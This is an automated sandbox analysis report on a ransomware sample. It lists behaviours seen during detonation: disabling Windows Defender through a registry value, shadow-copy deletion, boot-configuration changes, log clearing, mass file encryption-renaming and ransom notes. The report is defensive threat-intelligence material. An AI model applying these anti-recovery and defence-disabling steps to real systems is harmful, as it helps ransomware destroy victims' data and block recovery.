Analysis Overview
SHA256
29d2f9308947efac0c804497666e1f03d61bc9321fdb498152a5d481d1e61a35
Threat Level: Known bad
The file 29d2f9308947efac0c804497666e1f03d61bc9321fdb498152a5d481d1e61a35 was found to be: Known bad.
Malicious Activity Summary
Deletes Windows Defender Definitions
Modifies security service
Modifies Windows Defender Real-time Protection settings
Hive
Modifies boot configuration data using bcdedit
Deletes shadow copies
Clears Windows event logs
Modifies extensions of user files
Reads user/profile data of web browsers
Launches sc.exe
Drops file in Program Files directory
Suspicious behavior: EnumeratesProcesses
Suspicious use of WriteProcessMemory
Interacts with shadow copies
Suspicious use of AdjustPrivilegeToken
Runs net.exe
Runs ping.exe
Opens file in notepad (likely ransom note)
MITRE ATT&CK
Enterprise Matrix V6
Analysis: static1
Detonation Overview
Reported
2022-03-04 13:56
Signatures
Analysis: behavioral1
Detonation Overview
Submitted
2022-03-04 13:56
Reported
2022-03-04 13:58
Platform
win7-20220223-en
Max time kernel
4294183s
Max time network
136s
Command Line
Signatures
Deletes Windows Defender Definitions
| Description | Indicator | Process | Target |
| --- | --- | --- | --- |
| N/A | N/A | C:\Program Files\Windows Defender\MpCmdRun.exe | N/A |
Hive
Modifies Windows Defender Real-time Protection settings
Modifies security service
| Description | Indicator | Process | Target |
| --- | --- | --- | --- |
| Set value (int) | \REGISTRY\MACHINE\SYSTEM\ControlSet001\services\WinDefend\Start = "4" | C:\Windows\system32\reg.exe | N/A |
Clears Windows event logs
Deletes shadow copies
Modifies boot configuration data using bcdedit
| Description | Indicator | Process | Target |
| --- | --- | --- | --- |
| N/A | N/A | C:\Windows\system32\bcdedit.exe | N/A |
| N/A | N/A | C:\Windows\system32\bcdedit.exe | N/A |
Modifies extensions of user files
| Description | Indicator | Process | Target |
| --- | --- | --- | --- |
| File renamed | C:\Users\Admin\Pictures\ResumePublish.raw => C:\Users\Admin\Pictures\ResumePublish.raw.vrpsFFF1eWTusGB7TTIYumA7aIpvVysH5VIPkHFVz8n_AAAAAAAAAAA0.3w1gm | C:\Users\Admin\AppData\Local\Temp\29d2f9308947efac0c804497666e1f03d61bc9321fdb498152a5d481d1e61a35.exe | N/A |
| File opened for modification | C:\Users\Admin\Pictures\LimitEnter.png.vrpsFFF1eWTusGB7TTIYumA7aIpvVysH5VIPkHFVz8n_IAAAACAAAAA0.3w1gm | C:\Users\Admin\AppData\Local\Temp\29d2f9308947efac0c804497666e1f03d61bc9321fdb498152a5d481d1e61a35.exe | N/A |
| File renamed | C:\Users\Admin\Pictures\RestoreNew.raw => C:\Users\Admin\Pictures\RestoreNew.raw.vrpsFFF1eWTusGB7TTIYumA7aIpvVysH5VIPkHFVz8n_IAAAACAAAAA0.3w1gm | C:\Users\Admin\AppData\Local\Temp\29d2f9308947efac0c804497666e1f03d61bc9321fdb498152a5d481d1e61a35.exe | N/A |
| File renamed | C:\Users\Admin\Pictures\MergeExpand.tiff => C:\Users\Admin\Pictures\MergeExpand.tiff.vrpsFFF1eWTusGB7TTIYumA7aIpvVysH5VIPkHFVz8n_AAAAAAAAAAA0.3w1gm | C:\Users\Admin\AppData\Local\Temp\29d2f9308947efac0c804497666e1f03d61bc9321fdb498152a5d481d1e61a35.exe | N/A |
| File renamed | C:\Users\Admin\Pictures\SplitUnlock.tif => C:\Users\Admin\Pictures\SplitUnlock.tif.vrpsFFF1eWTusGB7TTIYumA7aIpvVysH5VIPkHFVz8n_AAAAAAAAAAA0.3w1gm | C:\Users\Admin\AppData\Local\Temp\29d2f9308947efac0c804497666e1f03d61bc9321fdb498152a5d481d1e61a35.exe | N/A |
| File renamed | C:\Users\Admin\Pictures\TraceJoin.png => C:\Users\Admin\Pictures\TraceJoin.png.vrpsFFF1eWTusGB7TTIYumA7aIpvVysH5VIPkHFVz8n_AAAAAAAAAAA0.3w1gm | C:\Users\Admin\AppData\Local\Temp\29d2f9308947efac0c804497666e1f03d61bc9321fdb498152a5d481d1e61a35.exe | N/A |
| File opened for modification | C:\Users\Admin\Pictures\TraceJoin.png.vrpsFFF1eWTusGB7TTIYumA7aIpvVysH5VIPkHFVz8n_AAAAAAAAAAA0.3w1gm | C:\Users\Admin\AppData\Local\Temp\29d2f9308947efac0c804497666e1f03d61bc9321fdb498152a5d481d1e61a35.exe | N/A |
| File renamed | C:\Users\Admin\Pictures\InitializeWatch.png => C:\Users\Admin\Pictures\InitializeWatch.png.vrpsFFF1eWTusGB7TTIYumA7aIpvVysH5VIPkHFVz8n_AAAAAAAAAAA0.3w1gm | C:\Users\Admin\AppData\Local\Temp\29d2f9308947efac0c804497666e1f03d61bc9321fdb498152a5d481d1e61a35.exe | N/A |
| File opened for modification | C:\Users\Admin\Pictures\OutWatch.crw.vrpsFFF1eWTusGB7TTIYumA7aIpvVysH5VIPkHFVz8n_AAAAAAAAAAA0.3w1gm | C:\Users\Admin\AppData\Local\Temp\29d2f9308947efac0c804497666e1f03d61bc9321fdb498152a5d481d1e61a35.exe | N/A |
| File opened for modification | C:\Users\Admin\Pictures\RestoreNew.raw.vrpsFFF1eWTusGB7TTIYumA7aIpvVysH5VIPkHFVz8n_IAAAACAAAAA0.3w1gm | C:\Users\Admin\AppData\Local\Temp\29d2f9308947efac0c804497666e1f03d61bc9321fdb498152a5d481d1e61a35.exe | N/A |
| File renamed | C:\Users\Admin\Pictures\SplitSkip.tiff => C:\Users\Admin\Pictures\SplitSkip.tiff.vrpsFFF1eWTusGB7TTIYumA7aIpvVysH5VIPkHFVz8n_AAAAAAAAAAA0.3w1gm | C:\Users\Admin\AppData\Local\Temp\29d2f9308947efac0c804497666e1f03d61bc9321fdb498152a5d481d1e61a35.exe | N/A |
| File opened for modification | C:\Users\Admin\Pictures\SplitUnlock.tif.vrpsFFF1eWTusGB7TTIYumA7aIpvVysH5VIPkHFVz8n_AAAAAAAAAAA0.3w1gm | C:\Users\Admin\AppData\Local\Temp\29d2f9308947efac0c804497666e1f03d61bc9321fdb498152a5d481d1e61a35.exe | N/A |
| File renamed | C:\Users\Admin\Pictures\OpenStart.tif => C:\Users\Admin\Pictures\OpenStart.tif.vrpsFFF1eWTusGB7TTIYumA7aIpvVysH5VIPkHFVz8n_AAAAAAAAAAA0.3w1gm | C:\Users\Admin\AppData\Local\Temp\29d2f9308947efac0c804497666e1f03d61bc9321fdb498152a5d481d1e61a35.exe | N/A |
| File renamed | C:\Users\Admin\Pictures\OutWatch.crw => C:\Users\Admin\Pictures\OutWatch.crw.vrpsFFF1eWTusGB7TTIYumA7aIpvVysH5VIPkHFVz8n_AAAAAAAAAAA0.3w1gm | C:\Users\Admin\AppData\Local\Temp\29d2f9308947efac0c804497666e1f03d61bc9321fdb498152a5d481d1e61a35.exe | N/A |
| File opened for modification | C:\Users\Admin\Pictures\MergeExpand.tiff.vrpsFFF1eWTusGB7TTIYumA7aIpvVysH5VIPkHFVz8n_AAAAAAAAAAA0.3w1gm | C:\Users\Admin\AppData\Local\Temp\29d2f9308947efac0c804497666e1f03d61bc9321fdb498152a5d481d1e61a35.exe | N/A |
| File opened for modification | C:\Users\Admin\Pictures\ResumePublish.raw.vrpsFFF1eWTusGB7TTIYumA7aIpvVysH5VIPkHFVz8n_AAAAAAAAAAA0.3w1gm | C:\Users\Admin\AppData\Local\Temp\29d2f9308947efac0c804497666e1f03d61bc9321fdb498152a5d481d1e61a35.exe | N/A |
| File opened for modification | C:\Users\Admin\Pictures\SplitSkip.tiff.vrpsFFF1eWTusGB7TTIYumA7aIpvVysH5VIPkHFVz8n_AAAAAAAAAAA0.3w1gm | C:\Users\Admin\AppData\Local\Temp\29d2f9308947efac0c804497666e1f03d61bc9321fdb498152a5d481d1e61a35.exe | N/A |
| File renamed | C:\Users\Admin\Pictures\LimitEnter.png => C:\Users\Admin\Pictures\LimitEnter.png.vrpsFFF1eWTusGB7TTIYumA7aIpvVysH5VIPkHFVz8n_IAAAACAAAAA0.3w1gm | C:\Users\Admin\AppData\Local\Temp\29d2f9308947efac0c804497666e1f03d61bc9321fdb498152a5d481d1e61a35.exe | N/A |
| File opened for modification | C:\Users\Admin\Pictures\InitializeWatch.png.vrpsFFF1eWTusGB7TTIYumA7aIpvVysH5VIPkHFVz8n_AAAAAAAAAAA0.3w1gm | C:\Users\Admin\AppData\Local\Temp\29d2f9308947efac0c804497666e1f03d61bc9321fdb498152a5d481d1e61a35.exe | N/A |
| File opened for modification | C:\Users\Admin\Pictures\OpenStart.tif.vrpsFFF1eWTusGB7TTIYumA7aIpvVysH5VIPkHFVz8n_AAAAAAAAAAA0.3w1gm | C:\Users\Admin\AppData\Local\Temp\29d2f9308947efac0c804497666e1f03d61bc9321fdb498152a5d481d1e61a35.exe | N/A |
Reads user/profile data of web browsers
Drops file in Program Files directory
| Description | Indicator | Process | Target |
| --- | --- | --- | --- |
| File created | C:\Program Files\Java\jdk1.7.0_80\jre\lib\jfr\JPjx_HOW_TO_DECRYPT.txt | C:\Users\Admin\AppData\Local\Temp\29d2f9308947efac0c804497666e1f03d61bc9321fdb498152a5d481d1e61a35.exe | N/A |
| File opened for modification | C:\Program Files\InstallDisconnect.vb.vrpsFFF1eWTusGB7TTIYumA7aIpvVysH5VIPkHFVz8n_AAAAAAAAAAA0.3w1gm | C:\Users\Admin\AppData\Local\Temp\29d2f9308947efac0c804497666e1f03d61bc9321fdb498152a5d481d1e61a35.exe | N/A |
| File opened for modification | C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Etc\GMT+4.vrpsFFF1eWTusGB7TTIYumA7aIpvVysH5VIPkHFVz8n_AAAAAAAAAAA0.3w1gm | C:\Users\Admin\AppData\Local\Temp\29d2f9308947efac0c804497666e1f03d61bc9321fdb498152a5d481d1e61a35.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Microsoft Office\Office14\1033\ONENOTE_F_COL.HXK.vrpsFFF1eWTusGB7TTIYumA7aIpvVysH5VIPkHFVz8n_IAAAACAAAAA0.3w1gm | C:\Users\Admin\AppData\Local\Temp\29d2f9308947efac0c804497666e1f03d61bc9321fdb498152a5d481d1e61a35.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Microsoft Office\Office14\PUBWIZ\PICCAP98.POC.vrpsFFF1eWTusGB7TTIYumA7aIpvVysH5VIPkHFVz8n_AAAAAAAAAAA0.3w1gm | C:\Users\Admin\AppData\Local\Temp\29d2f9308947efac0c804497666e1f03d61bc9321fdb498152a5d481d1e61a35.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Windows Sidebar\Gadgets\Calendar.Gadget\fr-FR\gadget.xml | C:\Users\Admin\AppData\Local\Temp\29d2f9308947efac0c804497666e1f03d61bc9321fdb498152a5d481d1e61a35.exe | N/A |
| File opened for modification | C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Asia\Damascus.vrpsFFF1eWTusGB7TTIYumA7aIpvVysH5VIPkHFVz8n_AAAAAAAAAAA0.3w1gm | C:\Users\Admin\AppData\Local\Temp\29d2f9308947efac0c804497666e1f03d61bc9321fdb498152a5d481d1e61a35.exe | N/A |
| File opened for modification | C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\visualvm\update_tracking\com-sun-tools-visualvm-charts.xml.vrpsFFF1eWTusGB7TTIYumA7aIpvVysH5VIPkHFVz8n_IAAAACAAAAA0.3w1gm | C:\Users\Admin\AppData\Local\Temp\29d2f9308947efac0c804497666e1f03d61bc9321fdb498152a5d481d1e61a35.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Microsoft Office\Office14\1033\PUBSPAPR\PDIR46F.GIF.vrpsFFF1eWTusGB7TTIYumA7aIpvVysH5VIPkHFVz8n_AAAAAAAAAAA0.3w1gm | C:\Users\Admin\AppData\Local\Temp\29d2f9308947efac0c804497666e1f03d61bc9321fdb498152a5d481d1e61a35.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Microsoft Office\Office14\CharSetTable.chr.vrpsFFF1eWTusGB7TTIYumA7aIpvVysH5VIPkHFVz8n_AAAAAAAAAAA0.3w1gm | C:\Users\Admin\AppData\Local\Temp\29d2f9308947efac0c804497666e1f03d61bc9321fdb498152a5d481d1e61a35.exe | N/A |
| File opened for modification | C:\Program Files\DVD Maker\Shared\DvdStyles\Full\NavigationUp_SelectionSubpicture.png | C:\Users\Admin\AppData\Local\Temp\29d2f9308947efac0c804497666e1f03d61bc9321fdb498152a5d481d1e61a35.exe | N/A |
| File opened for modification | C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\org-openide-nodes.jar.vrpsFFF1eWTusGB7TTIYumA7aIpvVysH5VIPkHFVz8n_AAAAAAAAAAA0.3w1gm | C:\Users\Admin\AppData\Local\Temp\29d2f9308947efac0c804497666e1f03d61bc9321fdb498152a5d481d1e61a35.exe | N/A |
| File opened for modification | C:\Program Files\Java\jre7\lib\fonts\LucidaTypewriterRegular.ttf.vrpsFFF1eWTusGB7TTIYumA7aIpvVysH5VIPkHFVz8n_AAAAAAAAAAA0.3w1gm | C:\Users\Admin\AppData\Local\Temp\29d2f9308947efac0c804497666e1f03d61bc9321fdb498152a5d481d1e61a35.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\AN01184_.WMF.vrpsFFF1eWTusGB7TTIYumA7aIpvVysH5VIPkHFVz8n_IAAAACAAAAA0.3w1gm | C:\Users\Admin\AppData\Local\Temp\29d2f9308947efac0c804497666e1f03d61bc9321fdb498152a5d481d1e61a35.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Microsoft Visual Studio 8\Common7\IDE\VSTA\ItemTemplates\VisualBasic\1033\AppConfigurationInternal.zip.vrpsFFF1eWTusGB7TTIYumA7aIpvVysH5VIPkHFVz8n_AAAAAAAAAAA0.3w1gm | C:\Users\Admin\AppData\Local\Temp\29d2f9308947efac0c804497666e1f03d61bc9321fdb498152a5d481d1e61a35.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Windows Photo Viewer\ja-JP\PhotoAcq.dll.mui | C:\Users\Admin\AppData\Local\Temp\29d2f9308947efac0c804497666e1f03d61bc9321fdb498152a5d481d1e61a35.exe | N/A |
| File opened for modification | C:\Program Files\DVD Maker\Shared\DvdStyles\OldAge\NavigationRight_ButtonGraphic.png | C:\Users\Admin\AppData\Local\Temp\29d2f9308947efac0c804497666e1f03d61bc9321fdb498152a5d481d1e61a35.exe | N/A |
| File opened for modification | C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.console.ui.notification_5.5.0.165303\html\olh001.htm.vrpsFFF1eWTusGB7TTIYumA7aIpvVysH5VIPkHFVz8n_AAAAAAAAAAA0.3w1gm | C:\Users\Admin\AppData\Local\Temp\29d2f9308947efac0c804497666e1f03d61bc9321fdb498152a5d481d1e61a35.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Microsoft Office\MEDIA\CAGCAT10\J0212957.WMF.vrpsFFF1eWTusGB7TTIYumA7aIpvVysH5VIPkHFVz8n_AAAAAAAAAAA0.3w1gm | C:\Users\Admin\AppData\Local\Temp\29d2f9308947efac0c804497666e1f03d61bc9321fdb498152a5d481d1e61a35.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Microsoft Office\Office14\1033\PUBSPAPR\ZPDIR6B.GIF.vrpsFFF1eWTusGB7TTIYumA7aIpvVysH5VIPkHFVz8n_IAAAACAAAAA0.3w1gm | C:\Users\Admin\AppData\Local\Temp\29d2f9308947efac0c804497666e1f03d61bc9321fdb498152a5d481d1e61a35.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms\FieldTypePreview\PASSWORD.JPG.vrpsFFF1eWTusGB7TTIYumA7aIpvVysH5VIPkHFVz8n_AAAAAAAAAAA0.3w1gm | C:\Users\Admin\AppData\Local\Temp\29d2f9308947efac0c804497666e1f03d61bc9321fdb498152a5d481d1e61a35.exe | N/A |
| File opened for modification | C:\Program Files\Common Files\Microsoft Shared\Stationery\Stars.jpg | C:\Users\Admin\AppData\Local\Temp\29d2f9308947efac0c804497666e1f03d61bc9321fdb498152a5d481d1e61a35.exe | N/A |
| File opened for modification | C:\Program Files\Common Files\Microsoft Shared\ink\sr-Latn-CS\tipresx.dll.mui | C:\Users\Admin\AppData\Local\Temp\29d2f9308947efac0c804497666e1f03d61bc9321fdb498152a5d481d1e61a35.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0200611.WMF.vrpsFFF1eWTusGB7TTIYumA7aIpvVysH5VIPkHFVz8n_IAAAACAAAAA0.3w1gm | C:\Users\Admin\AppData\Local\Temp\29d2f9308947efac0c804497666e1f03d61bc9321fdb498152a5d481d1e61a35.exe | N/A |
| File created | C:\Program Files\Java\jre7\lib\zi\Australia\JPjx_HOW_TO_DECRYPT.txt | C:\Users\Admin\AppData\Local\Temp\29d2f9308947efac0c804497666e1f03d61bc9321fdb498152a5d481d1e61a35.exe | N/A |
| File created | C:\Program Files (x86)\Common Files\microsoft shared\TextConv\JPjx_HOW_TO_DECRYPT.txt | C:\Users\Admin\AppData\Local\Temp\29d2f9308947efac0c804497666e1f03d61bc9321fdb498152a5d481d1e61a35.exe | N/A |
| File opened for modification | C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.babel.nls_eclipse_ja_4.4.0.v20140623020002\about.html.vrpsFFF1eWTusGB7TTIYumA7aIpvVysH5VIPkHFVz8n_AAAAAAAAAAA0.3w1gm | C:\Users\Admin\AppData\Local\Temp\29d2f9308947efac0c804497666e1f03d61bc9321fdb498152a5d481d1e61a35.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\NA00809_.WMF.vrpsFFF1eWTusGB7TTIYumA7aIpvVysH5VIPkHFVz8n_AAAAAAAAAAA0.3w1gm | C:\Users\Admin\AppData\Local\Temp\29d2f9308947efac0c804497666e1f03d61bc9321fdb498152a5d481d1e61a35.exe | N/A |
| File opened for modification | C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.ui.themes_1.0.1.v20140819-1717\plugin.xml.vrpsFFF1eWTusGB7TTIYumA7aIpvVysH5VIPkHFVz8n_AAAAAAAAAAA0.3w1gm | C:\Users\Admin\AppData\Local\Temp\29d2f9308947efac0c804497666e1f03d61bc9321fdb498152a5d481d1e61a35.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\Mac\CROATIAN.TXT | C:\Users\Admin\AppData\Local\Temp\29d2f9308947efac0c804497666e1f03d61bc9321fdb498152a5d481d1e61a35.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms3\FormsStyles\Lime.css.vrpsFFF1eWTusGB7TTIYumA7aIpvVysH5VIPkHFVz8n_AAAAAAAAAAA0.3w1gm | C:\Users\Admin\AppData\Local\Temp\29d2f9308947efac0c804497666e1f03d61bc9321fdb498152a5d481d1e61a35.exe | N/A |
| File opened for modification | C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.rcp.intro.zh_CN_5.5.0.165303.jar.vrpsFFF1eWTusGB7TTIYumA7aIpvVysH5VIPkHFVz8n_IAAAACAAAAA0.3w1gm | C:\Users\Admin\AppData\Local\Temp\29d2f9308947efac0c804497666e1f03d61bc9321fdb498152a5d481d1e61a35.exe | N/A |
| File opened for modification | C:\Program Files\Microsoft Games\Multiplayer\Checkers\ja-JP\ChkrRes.dll.mui.vrpsFFF1eWTusGB7TTIYumA7aIpvVysH5VIPkHFVz8n_AAAAAAAAAAA0.3w1gm | C:\Users\Admin\AppData\Local\Temp\29d2f9308947efac0c804497666e1f03d61bc9321fdb498152a5d481d1e61a35.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Microsoft Office\Document Themes 14\Angles.thmx.vrpsFFF1eWTusGB7TTIYumA7aIpvVysH5VIPkHFVz8n_AAAAAAAAAAA0.3w1gm | C:\Users\Admin\AppData\Local\Temp\29d2f9308947efac0c804497666e1f03d61bc9321fdb498152a5d481d1e61a35.exe | N/A |
| File created | C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\America\North_Dakota\JPjx_HOW_TO_DECRYPT.txt | C:\Users\Admin\AppData\Local\Temp\29d2f9308947efac0c804497666e1f03d61bc9321fdb498152a5d481d1e61a35.exe | N/A |
| File created | C:\Program Files (x86)\Common Files\microsoft shared\THEMES14\SATIN\JPjx_HOW_TO_DECRYPT.txt | C:\Users\Admin\AppData\Local\Temp\29d2f9308947efac0c804497666e1f03d61bc9321fdb498152a5d481d1e61a35.exe | N/A |
| File opened for modification | C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\locale\org-netbeans-core-multitabs_ja.jar.vrpsFFF1eWTusGB7TTIYumA7aIpvVysH5VIPkHFVz8n_AAAAAAAAAAA0.3w1gm | C:\Users\Admin\AppData\Local\Temp\29d2f9308947efac0c804497666e1f03d61bc9321fdb498152a5d481d1e61a35.exe | N/A |
| File opened for modification | C:\Program Files\VideoLAN\VLC\locale\be\LC_MESSAGES\vlc.mo.vrpsFFF1eWTusGB7TTIYumA7aIpvVysH5VIPkHFVz8n_AAAAAAAAAAA0.3w1gm | C:\Users\Admin\AppData\Local\Temp\29d2f9308947efac0c804497666e1f03d61bc9321fdb498152a5d481d1e61a35.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Common Files\System\msadc\en-US\msaddsr.dll.mui | C:\Users\Admin\AppData\Local\Temp\29d2f9308947efac0c804497666e1f03d61bc9321fdb498152a5d481d1e61a35.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\FD00361_.WMF.vrpsFFF1eWTusGB7TTIYumA7aIpvVysH5VIPkHFVz8n_AAAAAAAAAAA0.3w1gm | C:\Users\Admin\AppData\Local\Temp\29d2f9308947efac0c804497666e1f03d61bc9321fdb498152a5d481d1e61a35.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Microsoft Office\Office14\PUBWIZ\SIGN.XML.vrpsFFF1eWTusGB7TTIYumA7aIpvVysH5VIPkHFVz8n_AAAAAAAAAAA0.3w1gm | C:\Users\Admin\AppData\Local\Temp\29d2f9308947efac0c804497666e1f03d61bc9321fdb498152a5d481d1e61a35.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Microsoft Office\Stationery\1033\JUNGLE.GIF.vrpsFFF1eWTusGB7TTIYumA7aIpvVysH5VIPkHFVz8n_IAAAACAAAAA0.3w1gm | C:\Users\Admin\AppData\Local\Temp\29d2f9308947efac0c804497666e1f03d61bc9321fdb498152a5d481d1e61a35.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Windows Sidebar\Gadgets\Clock.Gadget\images\square_m.png | C:\Users\Admin\AppData\Local\Temp\29d2f9308947efac0c804497666e1f03d61bc9321fdb498152a5d481d1e61a35.exe | N/A |
| File created | C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.ecf.core.feature_1.1.0.v20140827-1444\JPjx_HOW_TO_DECRYPT.txt | C:\Users\Admin\AppData\Local\Temp\29d2f9308947efac0c804497666e1f03d61bc9321fdb498152a5d481d1e61a35.exe | N/A |
| File opened for modification | C:\Program Files\Common Files\Microsoft Shared\ink\fsdefinitions\oskpred.xml | C:\Users\Admin\AppData\Local\Temp\29d2f9308947efac0c804497666e1f03d61bc9321fdb498152a5d481d1e61a35.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Common Files\microsoft shared\THEMES14\BLENDS\THMBNAIL.PNG.vrpsFFF1eWTusGB7TTIYumA7aIpvVysH5VIPkHFVz8n_AAAAAAAAAAA0.3w1gm | C:\Users\Admin\AppData\Local\Temp\29d2f9308947efac0c804497666e1f03d61bc9321fdb498152a5d481d1e61a35.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\DD00405_.WMF.vrpsFFF1eWTusGB7TTIYumA7aIpvVysH5VIPkHFVz8n_AAAAAAAAAAA0.3w1gm | C:\Users\Admin\AppData\Local\Temp\29d2f9308947efac0c804497666e1f03d61bc9321fdb498152a5d481d1e61a35.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\TR00494_.WMF.vrpsFFF1eWTusGB7TTIYumA7aIpvVysH5VIPkHFVz8n_AAAAAAAAAAA0.3w1gm | C:\Users\Admin\AppData\Local\Temp\29d2f9308947efac0c804497666e1f03d61bc9321fdb498152a5d481d1e61a35.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Microsoft Office\CLIPART\Publisher\Backgrounds\WB02097_.GIF.vrpsFFF1eWTusGB7TTIYumA7aIpvVysH5VIPkHFVz8n_AAAAAAAAAAA0.3w1gm | C:\Users\Admin\AppData\Local\Temp\29d2f9308947efac0c804497666e1f03d61bc9321fdb498152a5d481d1e61a35.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Windows Sidebar\Gadgets\Currency.Gadget\images\combo-hover-right.png | C:\Users\Admin\AppData\Local\Temp\29d2f9308947efac0c804497666e1f03d61bc9321fdb498152a5d481d1e61a35.exe | N/A |
| File opened for modification | C:\Program Files\DVD Maker\Shared\DvdStyles\Travel\Passport_PAL.wmv | C:\Users\Admin\AppData\Local\Temp\29d2f9308947efac0c804497666e1f03d61bc9321fdb498152a5d481d1e61a35.exe | N/A |
| File opened for modification | C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Asia\Ulaanbaatar.vrpsFFF1eWTusGB7TTIYumA7aIpvVysH5VIPkHFVz8n_AAAAAAAAAAA0.3w1gm | C:\Users\Admin\AppData\Local\Temp\29d2f9308947efac0c804497666e1f03d61bc9321fdb498152a5d481d1e61a35.exe | N/A |
| File opened for modification | C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\locale\org-netbeans-modules-editor-mimelookup-impl_zh_CN.jar.vrpsFFF1eWTusGB7TTIYumA7aIpvVysH5VIPkHFVz8n_AAAAAAAAAAA0.3w1gm | C:\Users\Admin\AppData\Local\Temp\29d2f9308947efac0c804497666e1f03d61bc9321fdb498152a5d481d1e61a35.exe | N/A |
| File opened for modification | C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\visualvm\modules\locale\com-sun-tools-visualvm-charts_ja.jar.vrpsFFF1eWTusGB7TTIYumA7aIpvVysH5VIPkHFVz8n_AAAAAAAAAAA0.3w1gm | C:\Users\Admin\AppData\Local\Temp\29d2f9308947efac0c804497666e1f03d61bc9321fdb498152a5d481d1e61a35.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\CLASSIC1.WMF.vrpsFFF1eWTusGB7TTIYumA7aIpvVysH5VIPkHFVz8n_AAAAAAAAAAA0.3w1gm | C:\Users\Admin\AppData\Local\Temp\29d2f9308947efac0c804497666e1f03d61bc9321fdb498152a5d481d1e61a35.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\Providers\Proximity\11.00\brt55.ths.vrpsFFF1eWTusGB7TTIYumA7aIpvVysH5VIPkHFVz8n_IAAAACAAAAA0.3w1gm | C:\Users\Admin\AppData\Local\Temp\29d2f9308947efac0c804497666e1f03d61bc9321fdb498152a5d481d1e61a35.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Microsoft Office\Document Themes 14\Theme Colors\Elemental.xml.vrpsFFF1eWTusGB7TTIYumA7aIpvVysH5VIPkHFVz8n_AAAAAAAAAAA0.3w1gm | C:\Users\Admin\AppData\Local\Temp\29d2f9308947efac0c804497666e1f03d61bc9321fdb498152a5d481d1e61a35.exe | N/A |
| File opened for modification | C:\Program Files\Common Files\System\msadc\ja-JP\msadcer.dll.mui | C:\Users\Admin\AppData\Local\Temp\29d2f9308947efac0c804497666e1f03d61bc9321fdb498152a5d481d1e61a35.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Windows Sidebar\Gadgets\CPU.Gadget\en-US\gadget.xml | C:\Users\Admin\AppData\Local\Temp\29d2f9308947efac0c804497666e1f03d61bc9321fdb498152a5d481d1e61a35.exe | N/A |
| File created | C:\Program Files\VideoLAN\VLC\locale\wa\LC_MESSAGES\JPjx_HOW_TO_DECRYPT.txt | C:\Users\Admin\AppData\Local\Temp\29d2f9308947efac0c804497666e1f03d61bc9321fdb498152a5d481d1e61a35.exe | N/A |
| File opened for modification | C:\Program Files\DVD Maker\directshowtap.ax | C:\Users\Admin\AppData\Local\Temp\29d2f9308947efac0c804497666e1f03d61bc9321fdb498152a5d481d1e61a35.exe | N/A |
| File opened for modification | C:\Program Files\Java\jdk1.7.0_80\jre\lib\ext\sunjce_provider.jar.vrpsFFF1eWTusGB7TTIYumA7aIpvVysH5VIPkHFVz8n_AAAAAAAAAAA0.3w1gm | C:\Users\Admin\AppData\Local\Temp\29d2f9308947efac0c804497666e1f03d61bc9321fdb498152a5d481d1e61a35.exe | N/A |
| File opened for modification | C:\Program Files\Windows Sidebar\Gadgets\Weather.Gadget\images\undocked_black_moon-last-quarter.png | C:\Users\Admin\AppData\Local\Temp\29d2f9308947efac0c804497666e1f03d61bc9321fdb498152a5d481d1e61a35.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\EN00202_.WMF.vrpsFFF1eWTusGB7TTIYumA7aIpvVysH5VIPkHFVz8n_AAAAAAAAAAA0.3w1gm | C:\Users\Admin\AppData\Local\Temp\29d2f9308947efac0c804497666e1f03d61bc9321fdb498152a5d481d1e61a35.exe | N/A |
Launches sc.exe
Interacts with shadow copies
| Description | Indicator | Process | Target |
| --- | --- | --- | --- |
| N/A | N/A | C:\Windows\system32\vssadmin.exe | N/A |
Opens file in notepad (likely ransom note)
